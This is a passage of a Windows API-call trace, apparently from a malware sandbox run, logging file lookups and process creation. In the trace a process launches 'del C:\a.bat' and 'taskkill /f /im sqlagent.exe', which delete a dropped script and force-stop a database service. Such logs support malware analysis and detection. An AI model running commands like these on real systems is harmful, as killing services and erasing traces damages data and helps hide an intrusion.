ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.401] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.401] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123b0b48 | out: lpFileInformation=0x123b0b48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.401] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.401] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123b0b98 | out: lpFileInformation=0x123b0b98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.401] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.401] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123b0be8 | out: lpFileInformation=0x123b0be8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.401] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.401] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123b0c38 | out: lpFileInformation=0x123b0c38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.401] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.401] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123b0c88 | out: lpFileInformation=0x123b0c88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.402] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.402] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123ba5b0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0144.402] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b0cd8 | out: lpFileInformation=0x123b0cd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0144.402] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123ba680, nSize=0x64 | out: lpBuffer="") returned 0x35 [0144.402] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b0d28 | out: lpFileInformation=0x123b0d28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0144.402] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x144 [0144.402] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0144.402] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0144.402] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0144.402] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0144.403] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0144.403] GetEnvironmentStringsW () returned 0x8ea900* [0144.403] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0144.403] GetCurrentProcess () returned 0xffffffff [0144.403] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12392da0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12392da0*=0x154) returned 1 [0144.403] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12392da4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12392da4*=0x158) returned 1 [0144.403] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12392da8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12392da8*=0x130) returned 1 [0144.404] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"del C:\\a.bat\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x123e3500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"del C:\\a.bat\"", lpProcessInformation=0x123a3a80*(hProcess=0x140, hThread=0x13c, dwProcessId=0xf44, dwThreadId=0x670)) returned 1 [0144.444] CloseHandle (hObject=0x13c) returned 1 [0144.444] CloseHandle (hObject=0x130) returned 1 [0144.444] CloseHandle (hObject=0x158) returned 1 [0144.444] CloseHandle (hObject=0x154) returned 1 [0144.444] CloseHandle (hObject=0x144) returned 1 [0144.444] CloseHandle (hObject=0x138) returned 1 [0144.444] CloseHandle (hObject=0x134) returned 1 [0144.445] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xffffffff) returned 0x0 [0144.620] SetEvent (hEvent=0x150) returned 1 [0144.620] GetExitCodeProcess (in: hProcess=0x140, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x0) returned 1 [0144.620] GetProcessTimes (in: hProcess=0x140, lpCreationTime=0x123915a0, lpExitTime=0x123915a8, lpKernelTime=0x123915b0, lpUserTime=0x123915b8 | out: lpCreationTime=0x123915a0, lpExitTime=0x123915a8, lpKernelTime=0x123915b0, lpUserTime=0x123915b8) returned 1 [0144.620] CloseHandle (hObject=0x140) returned 1 [0144.621] SetEvent (hEvent=0x128) returned 1 [0144.621] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0144.627] SetEvent (hEvent=0x128) returned 1 [0144.627] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e8270, nSize=0x64 | out: lpBuffer="") returned 0x35 [0144.627] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0468 | out: lpFileInformation=0x123f0468*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.627] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.627] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123f04b8 | out: lpFileInformation=0x123f04b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.627] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.627] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0508 | out: lpFileInformation=0x123f0508*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.628] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.628] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123f0558 | out: lpFileInformation=0x123f0558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.628] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.628] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123f05a8 | out: lpFileInformation=0x123f05a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.628] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.628] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123f05f8 | out: lpFileInformation=0x123f05f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.628] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.628] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123f0648 | out: lpFileInformation=0x123f0648*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.629] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.629] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123f0698 | out: lpFileInformation=0x123f0698*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.629] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.629] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123f06e8 | out: lpFileInformation=0x123f06e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.629] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.629] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123f0738 | out: lpFileInformation=0x123f0738*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.629] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.629] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123f0788 | out: lpFileInformation=0x123f0788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.629] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.630] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123f07d8 | out: lpFileInformation=0x123f07d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0144.630] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0144.630] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e8340, nSize=0x64 | out: lpBuffer="") returned 0x63 [0144.630] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0828 | out: lpFileInformation=0x123f0828*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0144.630] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e8410, nSize=0x64 | out: lpBuffer="") returned 0x35 [0144.630] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f0878 | out: lpFileInformation=0x123f0878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0144.630] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0144.630] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0144.630] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0144.631] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0144.631] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0144.631] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0144.631] GetEnvironmentStringsW () returned 0x8ea900* [0144.631] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0144.631] GetCurrentProcess () returned 0xffffffff [0144.631] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234e890, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234e890*=0x144) returned 1 [0144.631] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234e894, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234e894*=0x154) returned 1 [0144.631] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234e898, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234e898*=0x158) returned 1 [0144.631] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im sqlagent.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12418a80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im sqlagent.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x13c, hThread=0x130, dwProcessId=0x3a0, dwThreadId=0xdc4)) returned 1 [0144.733] SetEvent (hEvent=0x150) returned 1 [0144.733] CloseHandle (hObject=0x130) returned 1 [0144.733] CloseHandle (hObject=0x158) returned 1 [0144.733] CloseHandle (hObject=0x154) returned 1 [0144.733] CloseHandle (hObject=0x144) returned 1 [0144.733] CloseHandle (hObject=0x140) returned 1 [0144.733] CloseHandle (hObject=0x134) returned 1 [0144.733] CloseHandle (hObject=0x138) returned 1 [0144.733] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0146.581] SetEvent (hEvent=0x150) returned 1 [0146.581] GetExitCodeProcess (in: hProcess=0x13c, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0146.595] GetProcessTimes (in: hProcess=0x13c, lpCreationTime=0x1234cee0, lpExitTime=0x1234cee8, lpKernelTime=0x1234cef0, lpUserTime=0x1234cef8 | out: lpCreationTime=0x1234cee0, lpExitTime=0x1234cee8, lpKernelTime=0x1234cef0, lpUserTime=0x1234cef8) returned 1 [0146.595] CloseHandle (hObject=0x13c) returned 1 [0146.602] SetEvent (hEvent=0x128) returned 1 [0146.602] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0146.732] SetEvent (hEvent=0x128) returned 1 [0146.732] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123ba750, nSize=0x64 | out: lpBuffer="") returned 0x35 [0146.733] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b0d78 | out: lpFileInformation=0x123b0d78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0146.733] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0146.734] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), 